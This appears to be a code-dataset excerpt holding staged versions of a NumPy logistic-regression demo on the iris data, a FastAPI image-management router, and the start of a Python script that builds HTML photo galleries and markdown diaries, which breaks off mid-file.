"step-3": "<mask token>\nmatplotlib.use('TkAgg')\n<mask token>\n\n\nclass LogisticRegression:\n \"\"\"LogisticRegression for binary classification\n \n max_iter: the maximum iteration times for training\n learning_rate: learing rate for gradiend decsend training\n\n Input's shape should be [sample_nums, data_dims]\n\n attrs:\n max_iter\n learning_rate\n (after fit)\n w\n b\n costs\n\n methods:\n fit\n predict\n predict_proba\n score \n \"\"\"\n\n def __init__(self, max_iter=2000, learning_rate=0.01):\n self.max_iter = max_iter\n self.learning_rate = learning_rate\n print('LogisticRegression Model(learning_rate={}, max_iteration={})'\n .format(self.learning_rate, self.max_iter))\n\n def sigmoid(self, z):\n return 1 / (1 + np.exp(-z))\n\n def initialize_with_zeros(self, dim):\n w = np.zeros((dim, 1))\n b = 0\n assert w.shape == (dim, 1)\n assert isinstance(b, float) or isinstance(b, int)\n return w, b\n\n def propagate(self, w, b, X, Y):\n m = X.shape[0]\n A = self.sigmoid(np.dot(X, w) + b)\n cost = -1 / m * np.sum(Y * np.log(A) + (1 - Y) * np.log(1 - A))\n dw = 1 / m * np.dot(X.T, A - Y)\n db = 1 / m * np.sum(A - Y)\n assert dw.shape == w.shape\n assert db.dtype == float\n cost = np.squeeze(cost)\n assert cost.shape == ()\n grads = {'dw': dw, 'db': db}\n return grads, cost\n\n def optimize(self, w, b, X, Y, max_iter, learning_rate, print_cost=False):\n costs = []\n for i in range(1, max_iter + 1):\n grads, cost = self.propagate(w, b, X, Y)\n w -= learning_rate * grads['dw']\n b -= learning_rate * grads['db']\n if i % 100 == 0:\n costs.append(cost)\n if print_cost:\n print('Cost after iteration %i: %f' % (i, cost))\n return w, b, costs\n\n def fit(self, X, Y, print_cost=False):\n print('Fit starting:')\n w, b = self.initialize_with_zeros(X.shape[1])\n iter_time = 0\n self.w, self.b, self.costs = self.optimize(w, b, X, Y, self.\n max_iter, self.learning_rate, print_cost)\n print('Fit complished!')\n\n def predict_proba(self, X):\n return self.sigmoid(np.dot(X, self.w) + self.b)\n\n def predict(self, X):\n proba = self.predict_proba(X)\n pre = np.zeros_like(proba, dtype=np.int)\n pre[proba > 0.5] = 1\n pre = np.squeeze(pre)\n return pre\n\n def score(self, X_test, Y_test):\n Y_pre = self.predict(X_test)\n score = np.sum(Y_pre == Y_test) / len(Y_pre)\n return score\n\n def __str__(self):\n return ('LogisticRegression Model(learning_rate={}, max_iteration={})'\n .format(self.learning_rate, self.max_iter))\n\n\nif __name__ == '__main__':\n from sklearn import datasets\n from sklearn.model_selection import train_test_split\n data = datasets.load_iris()\n x = data.data[:100, [0, 1]]\n y = np.array([(1 if i > 0 else 0) for i in data.target[:100]])\n x_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.3)\n model = LogisticRegression()\n model.fit(x_train, y_train.reshape(len(y_train), -1), True)\n print('Train Score:{}'.format(model.score(x_train, y_train)))\n print('Test Score:{}'.format(model.score(x_test, y_test)))\n plt.subplot(211)\n x_samples = np.linspace(4, 7, 500)\n y_samples = (-model.b - model.w[0] * x_samples) / model.w[1]\n plt.plot(x_samples, y_samples, 'r')\n plt.scatter(x[:50, 0], x[:50, 1], label='negative')\n plt.scatter(x[50:100, 0], x[50:100, 1], label='positive')\n plt.xlabel('petal length')\n plt.ylabel('petal width')\n plt.title('LosRes Results on iris datasets')\n plt.legend()\n plt.subplots_adjust(hspace=0.5, wspace=0.25)\n plt.subplot(212)\n plt.plot(range(len(model.costs)), model.costs, '-o')\n plt.xlabel('steps')\n plt.ylabel('loss')\n plt.title('loss 
function')\n plt.show()\n",
"step-4": "import numpy as np\nimport matplotlib\nmatplotlib.use('TkAgg')\nimport matplotlib.pyplot as plt\n\n\nclass LogisticRegression:\n \"\"\"LogisticRegression for binary classification\n \n max_iter: the maximum iteration times for training\n learning_rate: learing rate for gradiend decsend training\n\n Input's shape should be [sample_nums, data_dims]\n\n attrs:\n max_iter\n learning_rate\n (after fit)\n w\n b\n costs\n\n methods:\n fit\n predict\n predict_proba\n score \n \"\"\"\n\n def __init__(self, max_iter=2000, learning_rate=0.01):\n self.max_iter = max_iter\n self.learning_rate = learning_rate\n print('LogisticRegression Model(learning_rate={}, max_iteration={})'\n .format(self.learning_rate, self.max_iter))\n\n def sigmoid(self, z):\n return 1 / (1 + np.exp(-z))\n\n def initialize_with_zeros(self, dim):\n w = np.zeros((dim, 1))\n b = 0\n assert w.shape == (dim, 1)\n assert isinstance(b, float) or isinstance(b, int)\n return w, b\n\n def propagate(self, w, b, X, Y):\n m = X.shape[0]\n A = self.sigmoid(np.dot(X, w) + b)\n cost = -1 / m * np.sum(Y * np.log(A) + (1 - Y) * np.log(1 - A))\n dw = 1 / m * np.dot(X.T, A - Y)\n db = 1 / m * np.sum(A - Y)\n assert dw.shape == w.shape\n assert db.dtype == float\n cost = np.squeeze(cost)\n assert cost.shape == ()\n grads = {'dw': dw, 'db': db}\n return grads, cost\n\n def optimize(self, w, b, X, Y, max_iter, learning_rate, print_cost=False):\n costs = []\n for i in range(1, max_iter + 1):\n grads, cost = self.propagate(w, b, X, Y)\n w -= learning_rate * grads['dw']\n b -= learning_rate * grads['db']\n if i % 100 == 0:\n costs.append(cost)\n if print_cost:\n print('Cost after iteration %i: %f' % (i, cost))\n return w, b, costs\n\n def fit(self, X, Y, print_cost=False):\n print('Fit starting:')\n w, b = self.initialize_with_zeros(X.shape[1])\n iter_time = 0\n self.w, self.b, self.costs = self.optimize(w, b, X, Y, self.\n max_iter, self.learning_rate, print_cost)\n print('Fit complished!')\n\n def predict_proba(self, X):\n return self.sigmoid(np.dot(X, self.w) + self.b)\n\n def predict(self, X):\n proba = self.predict_proba(X)\n pre = np.zeros_like(proba, dtype=np.int)\n pre[proba > 0.5] = 1\n pre = np.squeeze(pre)\n return pre\n\n def score(self, X_test, Y_test):\n Y_pre = self.predict(X_test)\n score = np.sum(Y_pre == Y_test) / len(Y_pre)\n return score\n\n def __str__(self):\n return ('LogisticRegression Model(learning_rate={}, max_iteration={})'\n .format(self.learning_rate, self.max_iter))\n\n\nif __name__ == '__main__':\n from sklearn import datasets\n from sklearn.model_selection import train_test_split\n data = datasets.load_iris()\n x = data.data[:100, [0, 1]]\n y = np.array([(1 if i > 0 else 0) for i in data.target[:100]])\n x_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.3)\n model = LogisticRegression()\n model.fit(x_train, y_train.reshape(len(y_train), -1), True)\n print('Train Score:{}'.format(model.score(x_train, y_train)))\n print('Test Score:{}'.format(model.score(x_test, y_test)))\n plt.subplot(211)\n x_samples = np.linspace(4, 7, 500)\n y_samples = (-model.b - model.w[0] * x_samples) / model.w[1]\n plt.plot(x_samples, y_samples, 'r')\n plt.scatter(x[:50, 0], x[:50, 1], label='negative')\n plt.scatter(x[50:100, 0], x[50:100, 1], label='positive')\n plt.xlabel('petal length')\n plt.ylabel('petal width')\n plt.title('LosRes Results on iris datasets')\n plt.legend()\n plt.subplots_adjust(hspace=0.5, wspace=0.25)\n plt.subplot(212)\n plt.plot(range(len(model.costs)), model.costs, '-o')\n 
plt.xlabel('steps')\n plt.ylabel('loss')\n plt.title('loss function')\n plt.show()\n",
"step-5": "import numpy as np\nimport matplotlib\nmatplotlib.use('TkAgg')\nimport matplotlib.pyplot as plt\n\n\n\nclass LogisticRegression:\n '''LogisticRegression for binary classification\n \n max_iter: the maximum iteration times for training\n learning_rate: learing rate for gradiend decsend training\n\n Input's shape should be [sample_nums, data_dims]\n\n attrs:\n max_iter\n learning_rate\n (after fit)\n w\n b\n costs\n\n methods:\n fit\n predict\n predict_proba\n score \n '''\n\n def __init__(self, max_iter=2000, learning_rate=0.01):\n self.max_iter = max_iter\n self.learning_rate = learning_rate\n print('LogisticRegression Model(learning_rate={}, max_iteration={})'.format(\n self.learning_rate, self.max_iter))\n\n\n def sigmoid(self, z):\n return 1 / (1 + np.exp(-z))\n\n\n def initialize_with_zeros(self, dim):\n w = np.zeros((dim, 1))\n b = 0\n\n assert (w.shape == (dim, 1))\n assert (isinstance(b, float) or isinstance(b, int))\n\n return w, b \n\n\n def propagate(self, w, b, X, Y):\n m = X.shape[0]\n A = self.sigmoid(np.dot(X, w) + b)\n cost = -1 / m * np.sum(Y * np.log(A) + (1 - Y) * np.log(1 - A))\n\n dw = 1 / m * np.dot(X.T, A - Y)\n db = 1 / m * np.sum(A - Y) \n\n assert (dw.shape == w.shape)\n assert (db.dtype == float)\n cost = np.squeeze(cost)\n assert (cost.shape == ())\n grads = {'dw': dw,\n 'db': db}\n\n return grads, cost\n\n\n def optimize(self, w, b, X, Y, max_iter, learning_rate, print_cost=False):\n costs = []\n for i in range(1, max_iter+1):\n grads, cost = self.propagate(w, b, X, Y)\n w -= learning_rate * grads['dw']\n b -= learning_rate * grads['db']\n\n if i % 100 == 0:\n costs.append(cost)\n if print_cost:\n print('Cost after iteration %i: %f'%(i, cost))\n return w, b, costs\n\n\n def fit(self, X, Y, print_cost=False):\n print('Fit starting:')\n w, b = self.initialize_with_zeros(X.shape[1])\n iter_time = 0\n\n self.w, self.b, self.costs = self.optimize(w, b, X, Y, self.max_iter, self.learning_rate, print_cost)\n print('Fit complished!')\n\n\n def predict_proba(self, X):\n return self.sigmoid(np.dot(X, self.w) + self.b)\n\n\n def predict(self, X):\n proba = self.predict_proba(X)\n pre = np.zeros_like(proba, dtype=np.int)\n pre[proba > 0.5] = 1\n pre = np.squeeze(pre)\n return pre\n\n\n def score(self, X_test, Y_test):\n Y_pre = self.predict(X_test)\n score = np.sum(Y_pre == Y_test) / len(Y_pre)\n return score\n\n\n def __str__(self):\n return 'LogisticRegression Model(learning_rate={}, max_iteration={})'.format(\n self.learning_rate, self.max_iter)\n\n\nif __name__ == '__main__':\n from sklearn import datasets\n from sklearn.model_selection import train_test_split\n data = datasets.load_iris()\n x = data.data[:100, [0,1]]\n # x = np.hstack([np.ones((100, 1)), x])\n y = np.array([1 if i > 0 else 0 for i in data.target[:100]])\n x_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.3)\n\n model = LogisticRegression()\n model.fit(x_train, y_train.reshape(len(y_train), -1), True)\n print('Train Score:{}'.format(model.score(x_train, y_train)))\n print('Test Score:{}'.format(model.score(x_test, y_test)))\n\n plt.subplot(211)\n x_samples = np.linspace(4, 7, 500)\n y_samples = (- model.b - model.w[0]*x_samples) / model.w[1]\n plt.plot(x_samples, y_samples, 'r')\n plt.scatter(x[:50, 0], x[:50, 1], label='negative')\n plt.scatter(x[50:100, 0], x[50:100, 1], label='positive')\n plt.xlabel('petal length')\n plt.ylabel('petal width')\n plt.title('LosRes Results on iris datasets')\n plt.legend()\n \n plt.subplots_adjust(hspace=0.5,wspace=0.25)\n 
plt.subplot(212)\n plt.plot(range(len(model.costs)), model.costs, '-o')\n plt.xlabel('steps')\n plt.ylabel('loss')\n plt.title('loss function')\n plt.show()",
"step-ids": [
7,
11,
13,
14,
15
]
}
|
[
7,
11,
13,
14,
15
] |
from sqlalchemy.orm import Session
from fastapi import APIRouter, Depends, File
from typing import List
from ..models.database import ApiSession
from ..schemas.images_schema import ImageReturn
from . import image_service
router = APIRouter()
@router.get("/", response_model=List[ImageReturn])
def get_all_images(db: Session = Depends(ApiSession)):
return image_service.get_all_images(db)
@router.get("/{image_id}", response_model=ImageReturn)
def get_image_by_id(image_id: int, db: Session = Depends(ApiSession)):
return image_service.get_image_by_id(image_id, db)
@router.post("/name/{image_name}", response_model=List[ImageReturn])
def create_images(image_name: str, files: List[bytes] = File(...), db: Session = Depends(ApiSession)):
return image_service.create_images(image_name, files, db)
@router.delete("/{image_id}", response_model=None)
def delete_image_by_id(image_id: int, db: Session = Depends(ApiSession)):
return image_service.delete_image_by_id(image_id, db)
@router.delete("/", response_model=None)
def delete_images_by_ids(image_ids: List[int], db: Session = Depends(ApiSession)):
return image_service.delete_images_by_ids(image_ids, db)
|
normal
|
{
"blob_id": "874ca60749dba9ca8c8ebee2eecb1b80da50f11f",
"index": 3782,
"step-1": "<mask token>\n\n\[email protected]('/', response_model=List[ImageReturn])\ndef get_all_images(db: Session=Depends(ApiSession)):\n return image_service.get_all_images(db)\n\n\[email protected]('/{image_id}', response_model=ImageReturn)\ndef get_image_by_id(image_id: int, db: Session=Depends(ApiSession)):\n return image_service.get_image_by_id(image_id, db)\n\n\[email protected]('/name/{image_name}', response_model=List[ImageReturn])\ndef create_images(image_name: str, files: List[bytes]=File(...), db:\n Session=Depends(ApiSession)):\n return image_service.create_images(image_name, files, db)\n\n\[email protected]('/{image_id}', response_model=None)\ndef delete_image_by_id(image_id: int, db: Session=Depends(ApiSession)):\n return image_service.delete_image_by_id(image_id, db)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\[email protected]('/', response_model=List[ImageReturn])\ndef get_all_images(db: Session=Depends(ApiSession)):\n return image_service.get_all_images(db)\n\n\[email protected]('/{image_id}', response_model=ImageReturn)\ndef get_image_by_id(image_id: int, db: Session=Depends(ApiSession)):\n return image_service.get_image_by_id(image_id, db)\n\n\[email protected]('/name/{image_name}', response_model=List[ImageReturn])\ndef create_images(image_name: str, files: List[bytes]=File(...), db:\n Session=Depends(ApiSession)):\n return image_service.create_images(image_name, files, db)\n\n\[email protected]('/{image_id}', response_model=None)\ndef delete_image_by_id(image_id: int, db: Session=Depends(ApiSession)):\n return image_service.delete_image_by_id(image_id, db)\n\n\[email protected]('/', response_model=None)\ndef delete_images_by_ids(image_ids: List[int], db: Session=Depends(ApiSession)\n ):\n return image_service.delete_images_by_ids(image_ids, db)\n",
"step-3": "<mask token>\nrouter = APIRouter()\n\n\[email protected]('/', response_model=List[ImageReturn])\ndef get_all_images(db: Session=Depends(ApiSession)):\n return image_service.get_all_images(db)\n\n\[email protected]('/{image_id}', response_model=ImageReturn)\ndef get_image_by_id(image_id: int, db: Session=Depends(ApiSession)):\n return image_service.get_image_by_id(image_id, db)\n\n\[email protected]('/name/{image_name}', response_model=List[ImageReturn])\ndef create_images(image_name: str, files: List[bytes]=File(...), db:\n Session=Depends(ApiSession)):\n return image_service.create_images(image_name, files, db)\n\n\[email protected]('/{image_id}', response_model=None)\ndef delete_image_by_id(image_id: int, db: Session=Depends(ApiSession)):\n return image_service.delete_image_by_id(image_id, db)\n\n\[email protected]('/', response_model=None)\ndef delete_images_by_ids(image_ids: List[int], db: Session=Depends(ApiSession)\n ):\n return image_service.delete_images_by_ids(image_ids, db)\n",
"step-4": "from sqlalchemy.orm import Session\nfrom fastapi import APIRouter, Depends, File\nfrom typing import List\nfrom ..models.database import ApiSession\nfrom ..schemas.images_schema import ImageReturn\nfrom . import image_service\nrouter = APIRouter()\n\n\[email protected]('/', response_model=List[ImageReturn])\ndef get_all_images(db: Session=Depends(ApiSession)):\n return image_service.get_all_images(db)\n\n\[email protected]('/{image_id}', response_model=ImageReturn)\ndef get_image_by_id(image_id: int, db: Session=Depends(ApiSession)):\n return image_service.get_image_by_id(image_id, db)\n\n\[email protected]('/name/{image_name}', response_model=List[ImageReturn])\ndef create_images(image_name: str, files: List[bytes]=File(...), db:\n Session=Depends(ApiSession)):\n return image_service.create_images(image_name, files, db)\n\n\[email protected]('/{image_id}', response_model=None)\ndef delete_image_by_id(image_id: int, db: Session=Depends(ApiSession)):\n return image_service.delete_image_by_id(image_id, db)\n\n\[email protected]('/', response_model=None)\ndef delete_images_by_ids(image_ids: List[int], db: Session=Depends(ApiSession)\n ):\n return image_service.delete_images_by_ids(image_ids, db)\n",
"step-5": "from sqlalchemy.orm import Session\nfrom fastapi import APIRouter, Depends, File\nfrom typing import List\n\nfrom ..models.database import ApiSession\nfrom ..schemas.images_schema import ImageReturn\n\nfrom . import image_service\n\nrouter = APIRouter()\n\[email protected](\"/\", response_model=List[ImageReturn])\ndef get_all_images(db: Session = Depends(ApiSession)):\n return image_service.get_all_images(db)\n\[email protected](\"/{image_id}\", response_model=ImageReturn)\ndef get_image_by_id(image_id: int, db: Session = Depends(ApiSession)):\n return image_service.get_image_by_id(image_id, db)\n\[email protected](\"/name/{image_name}\", response_model=List[ImageReturn])\ndef create_images(image_name: str, files: List[bytes] = File(...), db: Session = Depends(ApiSession)):\n return image_service.create_images(image_name, files, db)\n\[email protected](\"/{image_id}\", response_model=None)\ndef delete_image_by_id(image_id: int, db: Session = Depends(ApiSession)):\n return image_service.delete_image_by_id(image_id, db)\n\[email protected](\"/\", response_model=None)\ndef delete_images_by_ids(image_ids: List[int], db: Session = Depends(ApiSession)):\n return image_service.delete_images_by_ids(image_ids, db)",
"step-ids": [
4,
5,
6,
7,
8
]
}
|
[
4,
5,
6,
7,
8
] |
"""
Make html galleries from media directories. Organize by dates, by subdirs or by
the content of a diary file. The diary file is a markdown file organized by
dates, each day described by a text and some medias (photos and movies).
The diary file can be exported to:
* an html file with the text and a subset of the medias associated with each day,
* the previous html file extended with all medias in the media directory,
* an html file ready to import into Blogger.
"""
import sys
import os
import argparse
import glob
import shutil
import re
import io
import bisect
import locale
import textwrap
import base64
import datetime
import urllib
from configparser import ConfigParser
from collections import defaultdict
from subprocess import check_output, CalledProcessError, STDOUT
from urllib.request import urlopen
import colorama
import clipboard
import PIL
from PIL import Image, ImageChops
from lxml import objectify
import markdown
USAGE = """
galerie --gallery <root-dir> [--sourcedir <media-dir>]
[--bydir true|false*]
[--bydate true|false*]
[--diary true|false*]
[--recursive true|false*]
[--dates source*|diary|<yyyymmdd-yyyymmdd>]
[--github_pages true|false]
[--dest <directory>]
[--forcethumb]
galerie --update <root-dir>
galerie --create <root-dir> --sourcedir <media-dir>
[--recursive true|false*]
[--dates source*|<yyyymmdd-yyyymmdd>]
galerie --blogger <root-dir> --url <url>
[--check]
[--full]
[--dest <filename>]
Notes:
- * gives default
- all options can be abbreviated if there is no conflict with other options (--gallery --> --gal)
"""
# -- Post objects -------------------------------------------------------------
CAPTION_IMAGE_STYLE = '''\
<style type="text/css">
span { display:inline-table; }
</style>\
'''
STYLE = '''\
<style type="text/css">
p { margin-top:0px; margin-bottom:0px; }
h3 { font-size: 100%%; font-weight: bold; margin-top:0px; margin-bottom:0px; }
</style>
'''
START = f'''\
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>%s</title>
<link rel="icon" href="favicon.ico" />
<meta name="viewport" content="width=device-width">
<link rel="stylesheet" href="photobox/photobox.css">
<script src="photobox/jquery.min.js"></script>
<script src="photobox/jquery.photobox.js"></script>
{CAPTION_IMAGE_STYLE}
{STYLE}
</head>
<body>\
'''
BUTTONS = '''\
<button id="btn_full" type="button" style="position: fixed; width: 50px; top: 20px; right: 20px; background-color:white">Full</button>
<button id="btn_blog" type="button" style="position: fixed; width: 50px; top: 40px; right: 20px; background-color:white">Diary</button>
<button id="btn_text" type="button" style="position: fixed; width: 50px; top: 60px; right: 20px; background-color:white">Text</button>
<script>
$('#btn_full').click(function() {
$("[id^=gallery-blog]").show();
$("[id^=gallery-dcim]").show();
$("div.extra").show();
});
$('#btn_text').click(function() {
$("[id^=gallery-blog]").hide();
$("[id^=gallery-dcim]").hide();
$("div.extra").hide();
});
$('#btn_blog').click(function() {
$("[id^=gallery-blog]").show();
$("[id^=gallery-dcim]").hide();
$("div.extra").hide();
});
</script>
'''
SUBDIR_BACKCOL = '#eee'
END = '</body>\n</html>'
SEP = '<hr color="#C0C0C0" size="1" />'
IMGPOST = '<a href="%s"><img src="%s" width="%d" height="%d" title="%s"/></a>'
VIDPOST = '<a href="%s" rel="video"><img src="%s" width="%d" height="%d" title="%s"/></a>'
IMGPOSTCAPTION = '''\
<span>
<a href="%s"><img src=%s width="%d" height="%d" title="%s"/></a>
<p>%s</p>
</span>
'''
VIDPOSTCAPTION = '''\
<span>
<a href="%s" rel="video"><img src=%s width="%d" height="%d" title="%s"/></a>
<p>%s</p>
</span>
'''
IMGDCIM = '<a href="%s"><img src="%s" width="%d" height="%d" title="%s"/></a>'
VIDDCIM = '<a href="%s" rel="video"><img src="%s" width="%d" height="%d" title="%s"/></a>'
# to reduce the space between images, we use:
# "display: block;", "margin-bottom: 0em;" and "font-size: 0;"
# "display: block;" on img: correct spacing on desktop but not centered on phone
# "display: block;" on a: ok
DIRPOST = '<a href="%s"><img src="%s" width="%d" height="%d" style="border: 1px solid #C0C0C0;" /></a>'
DIRPOSTCAPTION = f'''
<span style="background-color:{SUBDIR_BACKCOL}; margin-bottom: 8px; border: 1px solid #C0C0C0;">
<a href="%s"><img src="%s" width="%d" height="%d" style="border: 1px solid #C0C0C0;" /></a>
<p style="margin-left:2px;">%s</p>
</span>
'''
BIMGPAT = '''\
<div class="separator" style="clear: both; text-align: center;">
<a href="%s" style="clear: left; margin-bottom: 0em; margin-right: 1em; font-size: 0; display: block;">
<img border="0" src="%s" width="640" />
</a></div>
'''
CAPTION_PAT = '''\
<div class="separator" style="clear: both; text-align: center;">
%s
</div>
'''
class Post:
def __init__(self, date, text, medias):
# date: yyyymmdd
self.date = date
self.text = text
self.medias = medias
self.dcim = []
self.daterank = 0
self.extra = False
def __lt__(self, other):
return self.date < other.date
@classmethod
def from_markdown(cls, post):
m = re.match(r'\[(\d\d\d\d/\d\d/\d\d)\]\n*', post[0])
if m:
date = m.group(1).replace('/', '')
if not validate_date(date):
error('Incorrect date value:', date)
del post[0]
else:
error('No date in post', ' '.join(post))
while post and not post[0].strip():
del post[0]
text = ''
while post and not re.match(r'!?\[\]', post[0]):
text += post[0]
del post[0]
# remove empty lines at end
text = re.sub(r'\n\n$', '\n', text)
medias = list()
while post and (match := re.match(r'!?\[\]\((.*)\)', post[0])):
media = match.group(1)
caption = None
del post[0]
if post and not re.match(r'!?\[\]', post[0]):
caption = post[0].strip()
del post[0]
if match.group(0)[0] == '!':
medias.append(PostImage(caption, media))
else:
medias.append(PostVideo(caption, media))
return cls(date, text, medias)
@classmethod
def from_date(cls, date):
dt = datetime.datetime.strptime(date, '%Y%m%d')
datetext = dt.strftime("%A %d %B %Y").capitalize()
post = cls(date, text=datetext, medias=[])
post.daterank = 1
return post
def to_html(self, args, target='regular'):
if target == 'regular':
if args.diary:
return self.to_html_diary(args)
else:
return self.to_html_regular(args)
if target == 'blogger':
return self.to_html_blogger()
def to_html_regular(self, args):
html = list()
if self.text:
# possible with --bydate
html.append(markdown.markdown(self.text))
subdirs, dcim = dispatch_post_items(self.dcim)
if self.dcim:
html.append(SEP)
for media in subdirs:
html.append(media.to_html_dcim(args))
if dcim:
html.append(f'<div id="gallery-dcim-{self.date}-{self.daterank}">')
for media in dcim:
html.append(media.to_html_dcim(args))
html.append('</div>')
html.append(SEP)
return html
def to_html_diary(self, args):
html = list()
if self.extra:
html.append('<div class="extra">')
if self.text:
html.append(markdown.markdown(self.text))
if self.medias:
html.append(f'<div id="gallery-blog-{self.date}-{self.daterank}">')
for media in self.medias:
html.append(media.to_html_post(args))
html.append('</div>')
_, dcim = dispatch_post_items(self.dcim)
if dcim:
html.append(f'<div id="gallery-dcim-{self.date}-{self.daterank}">')
html.append(SEP)
for media in dcim:
html.append(media.to_html_dcim(args))
html.append('</div>')
html.append(SEP)
if self.extra:
html.append('</div>')
return html
def to_html_blogger(self):
html = list()
html.append(markdown.markdown(self.text))
for image in self.medias:
html.append(image.to_html_blogger())
html.append(SEP)
return html
class PostItem:
def __init__(self, caption, uri, thumb=None, thumbsize=None, descr=''):
self.caption = caption
self.uri = uri
self.basename = os.path.basename(uri)
self.thumb = thumb
self.thumbsize = thumbsize
self.descr = descr
self.resized_url = None
class PostImage(PostItem):
def to_markdown(self):
if not self.caption:
            return '![](%s)' % (self.uri,)
else:
            return '![](%s)\n%s' % (self.uri, self.caption)
def to_html_post(self, args):
descr = self.descr if args.thumbnails.media_description else ''
if not self.caption:
return IMGPOST % (self.uri, self.thumb, *self.thumbsize, descr)
else:
return IMGPOSTCAPTION % (self.uri, self.thumb, *self.thumbsize, descr, self.caption)
def to_html_dcim(self, args):
descr = self.descr if args.thumbnails.media_description else ''
return IMGDCIM % (relative_url(self.uri, args.root), self.thumb, *self.thumbsize, descr)
def to_html_blogger(self):
if not self.caption:
return BIMGPAT % (self.uri, self.resized_url)
else:
return f'{BIMGPAT}\n{CAPTION_PAT}' % (self.uri, self.resized_url, self.caption)
class PostVideo(PostItem):
def to_markdown(self):
if not self.caption:
return '[](%s)' % (self.uri,)
else:
return '[](%s)\n%s' % (self.uri, self.caption)
def to_html_post(self, args):
descr = self.descr if args.thumbnails.media_description else ''
if not self.caption:
return VIDPOST % (self.uri, self.thumb, *self.thumbsize, descr)
else:
return VIDPOSTCAPTION % (self.uri, self.thumb, *self.thumbsize, descr, self.caption)
def to_html_dcim(self, args):
descr = self.descr if args.thumbnails.media_description else ''
return VIDDCIM % (relative_url(self.uri, args.root), self.thumb, *self.thumbsize, descr)
def to_html_blogger(self):
x = f'<p style="text-align: center;">{self.iframe}</p>'
if not self.caption:
return x
else:
return f'%s\n{CAPTION_PAT}' % (x, self.caption)
class PostSubdir(PostItem):
def to_html_dcim(self, args):
basename = os.path.basename(self.htmname)
posts = self.posts
title = self.caption
print_html(args, posts, title, self.htmname)
if not self.caption:
return DIRPOST % (basename, self.thumb, *self.thumbsize)
else:
return DIRPOSTCAPTION % (basename, self.thumb, *self.thumbsize, self.caption)
def relative_url(path, root):
"""
    Returns a normalized url to path, relative to root
"""
try:
url = os.path.relpath(path, root)
except:
        error('Unable to make a relative url:', path, root)
url = url.replace('\\', '/') if os.sep == '\\' else url
return urllib.parse.quote(url)
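# For illustration (posix-style paths, hypothetical names):
#   relative_url('/photos/2020/img 1.jpg', '/photos') -> '2020/img%201.jpg'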
# -- Markdown parser ----------------------------------------------------------
def parse_markdown(filename):
"""
Generate Post objects from markdown. Date must be present in each post and
    posts must be ordered by date.
"""
if not os.path.exists(filename):
error('File not found', filename)
posts = list()
with open(filename, encoding='utf-8') as f:
line = next(f)
if line.startswith('# '):
title = line[2:].strip()
record = []
next(f)
else:
title = None
record = [line]
for line in f:
if not line.startswith('___'):
record.append(line)
else:
posts.append(Post.from_markdown(record))
record = []
# set rank of posts in date
daterank = defaultdict(int)
for post in posts:
daterank[post.date] += 1
post.daterank = daterank[post.date]
# check post order
for post1, post2 in zip(posts[:-1], posts[1:]):
if post1.date > post2.date:
error('Posts are not ordered', f'{post1.date} > {post2.date}')
return title, posts
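# A minimal sketch of the markdown diary file that parse_markdown expects
# (names and dates below are invented for illustration): the file starts with
# a "# title" line, each post opens with a [yyyy/mm/dd] line, image lines use
# ![](...), video lines use [](...), an optional caption may follow a media
# line, and posts end with a line of underscores:
#
#   # Summer trip
#
#   [2020/07/14]
#
#   Some text describing the day.
#
#   ![](IMG_20200714_101010.jpg)
#   An optional caption
#   [](VID_20200714_121212.mp4)
#   ______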
# -- Markdown printer ---------------------------------------------------------
def print_markdown(posts, title, fullname):
with open(fullname, 'wt', encoding='utf-8') as fdst:
print(f'# {title}\n', file=fdst)
for post in posts:
date = f'[{post.date[0:4]}/{post.date[4:6]}/{post.date[6:8]}]'
print(date, file=fdst)
if post.text:
print(file=fdst)
for line in post.text.splitlines():
if not line:
print(file=fdst)
else:
for chunk in textwrap.wrap(line, width=78):
print(chunk, file=fdst)
if post.medias:
print(file=fdst)
for media in post.medias:
print(media.to_markdown(), file=fdst)
print('______', file=fdst)
# -- html printer -------------------------------------------------------------
def compose_html_reduced(args, posts, title, target):
html = list()
html.append(START % title)
for post in posts:
for line in post.to_html(args, target):
html.append(line.strip())
html.append('')
html.append(END)
return html
def compose_html_full(args, posts, title, target):
html = list()
html.append(START % title)
if args.diary:
html.append(BUTTONS)
for post in posts:
for line in post.to_html(args, target):
html.append(line.strip())
html.append('')
html.append('<script>')
for post in posts:
if post.medias:
gallery_id = f'gallery-blog-{post.date}-{post.daterank}'
html.append(gallery_call(args, gallery_id))
if post.dcim:
gallery_id = f'gallery-dcim-{post.date}-{post.daterank}'
html.append(gallery_call(args, gallery_id))
html.append('</script>')
html.append(END)
return html
def print_html_to_stream(args, posts, title, stream, target):
if target == 'regular':
for line in compose_html_full(args, posts, title, target):
print(line, file=stream)
else:
for line in compose_html_reduced(args, posts, title, target):
print(line, file=stream)
def print_html(args, posts, title, html_name, target='regular'):
assert target in ('regular', 'blogger')
with io.StringIO() as f:
print_html_to_stream(args, posts, title, f, target)
html = f.getvalue()
if html_name:
if os.path.exists(html_name):
# test if the generated html is identical to the one already on disk
with open(html_name, 'rt', encoding='utf-8') as f:
html0 = f.read()
if html == html0:
return None
with open(html_name, 'wt', encoding='utf-8') as f:
f.write(html)
return None
else:
return html
GALLERYCALL = """
$('#%s').photobox('a', {
loop:%s,
thumbs:%s,
autoplay:%s,
time:%d,
zoomable:%s ,
rotatable:%s,
wheelNextPrev:%s
});
"""
def gallery_call(args, gallery_id):
return GALLERYCALL.replace('\n', '') % (
gallery_id,
str(args.photobox.loop).lower(),
str(args.photobox.thumbs).lower(),
str(args.photobox.autoplay).lower(),
args.photobox.time,
str(args.photobox.zoomable).lower(),
str(args.photobox.rotatable).lower(),
str(args.photobox.wheelNextPrev).lower(),
)
# -- Media description --------------------------------------------------------
def is_image_file(name):
return os.path.splitext(name)[1].lower() in (
'.jpg', '.jpeg', '.png', '.gif', '.bmp', '.webp', '.tif'
)
def is_video_file(name):
return os.path.splitext(name)[1].lower() in (
'.mp4', '.webm', '.mkv', '.flv', '.m4v', '.avi', '.wmv', '.mts', '.vob', '.divx'
)
def is_media(name):
return is_image_file(name) or is_video_file(name)
def validate_date(datestr):
# datestr = yyyymmdd
try:
datetime.datetime.strptime(datestr, '%Y%m%d')
return True
except ValueError:
return False
def date_from_name(name):
# heuristics
if match := re.search(r'(?:\D|^)(\d{8})(?:\D|$)', name, re.ASCII):
digits = match.group(1)
if validate_date(digits):
return digits
return None
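# For illustration, with hypothetical file names:
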